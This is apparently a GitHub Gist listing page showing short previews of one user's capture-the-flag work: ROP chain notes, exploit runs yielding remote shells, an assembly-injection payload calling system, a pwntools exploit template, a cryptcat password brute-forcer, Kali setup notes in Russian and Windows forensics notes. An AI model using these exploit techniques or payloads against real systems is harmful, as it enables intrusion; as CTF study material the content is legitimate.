Skip to content

Instantly share code, notes, and snippets.

@v0s
v0s / 100toes.sh
Created July 26, 2016 18:10
100 toes again exploit
#
# ROP explanation:
# 0x00401bd3 pop rdi / ret
# 0x00401e29 "%d" → rdi
# 0x00401bd1 pop rsi / pop r15 / ret
# 0x00603124 some writable memory in .bss → rsi
# 0 → r15
# 0x004006f0 jmp scanf (to read our data into memory at 0x00603124)
# 0x00401bd3 pop rdi / ret
# 0x00603124 now contains data we control → rdi
** Если нет 1.5 часов, можно пропустить dist-upgrade, === Advanced === и disk shrink. Сэкономит полчаса
Подробная установка: https://youtu.be/nZ3mDnpZeic
https://kali.download/base-images/*/*-installer-amd64.iso.torrent
/etc/network/interfaces - change interface to eth0
static
address 192.168.192.64
netmask 255.255.255.0
/*
* BUILD: g++ -O3 -funroll-loops -march=native -fpermissive -o bruteforce_cryptcat bruteforce_cryptcat.cpp
* USAGE: pv /usr/share/wordlists/rockyou.txt.gz | gzip -d | ./bruteforce_cryptcat
*
* !!! freedom246 -> 8192 766020790x
*/
#include <stdio.h>
#include "twofish.cpp"
@v0s
v0s / README.md
Created August 27, 2018 16:16
Meepwn 2018 vconv exploit

Meepwn 2018 'vconv' exploit

The chall features an off-the-shelf Vietnamese encoding converter, and was not solved during the CTF by any team.

while true ; do python meepwn_vconv_exploit.py HOST=178.128.217.117 PORT=7171 'ls -la ~' | grep -A10 out: ; done
<...>
out:total 84
drwxr-x--- 1 root unikey  4096 Aug 26 06:40 .
drwxr-xr-x 1 root root 4096 Aug 26 06:40 ..
@v0s
v0s / new_splo.py
Created March 10, 2019 01:04
Exploit for Pwny Race Episode 2 (./chall3)
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template --host 54.194.197.206 --port 11528 ./chall3
from pwn import *
# Set up pwntools for the correct architecture
exe = context.binary = ELF('./chall3')
# Many built-in settings can be controlled on the command-line and show up
@v0s
v0s / plan.txt
Created March 25, 2019 19:51
0CTF Quals 2019 — flropyd (Floyd—Warshall using a ROP chain)
NODE_COUNT = 32 — 63
for ( i = 0LL; i < NODE_COUNT; ++i )
{
for ( j = 0LL; j < NODE_COUNT; ++j )
{
for ( k = 0LL; k < NODE_COUNT; ++k )
{
if ( WEIGHTS[(j << 6) + k] > (unsigned __int64)(WEIGHTS[(j << 6) + i] + WEIGHTS[(i << 6) + k]) )
@v0s
v0s / README.md
Last active April 30, 2019 05:28
Sandbox ROP RCE (ructf 2019)

Sandbox RCE via ROP

root@kali:/mnt/hgfs/f/sandbox/proxy# ./sandbox_rce.py 
[+] Opening connection to 127.0.0.1 on port 16780: Done
[*] Closed connection to 127.0.0.1 port 16780
[+] Opening connection to 127.0.0.1 on port 16780: Done
Stack canary: 00667104293168fb proxy base: 0x5611dcb23000 libc base: 0x7ff23c8f9000
[*] Switching to interactive mode
foo\x00uuid\x0041414141414141414141414sh: turning off NDELAY mode
@v0s
v0s / README.md
Last active May 30, 2019 12:59
FAUST CTF SLOC writeup

FAUST CTF SLOC writeup

The challenge features a custom language compiler/preprocessor that generates GNU ASM source, compiles it and executes the resulting binary.

First bug that we exploited was an RCE leveraging non-escaped strings in generated assembly code.

SLOC source code that triggers the vulnerability:

CALL WRITECHAR "id\x00\"
CALL WRITECHAR ";string1:putchar:call[\r]system@PLT;call[\r]exit@PLT;#"
@v0s
v0s / 1_notes.txt
Created October 15, 2023 17:50
SPbCTF Pro — форенсика образов Windows
===== Форенсика и incident response, винда =====
Цель — установить ход инцидента
Подход: смотрим на всё, записываем интересное, собираем в голове картинку
=== Монтирование и автосбор ===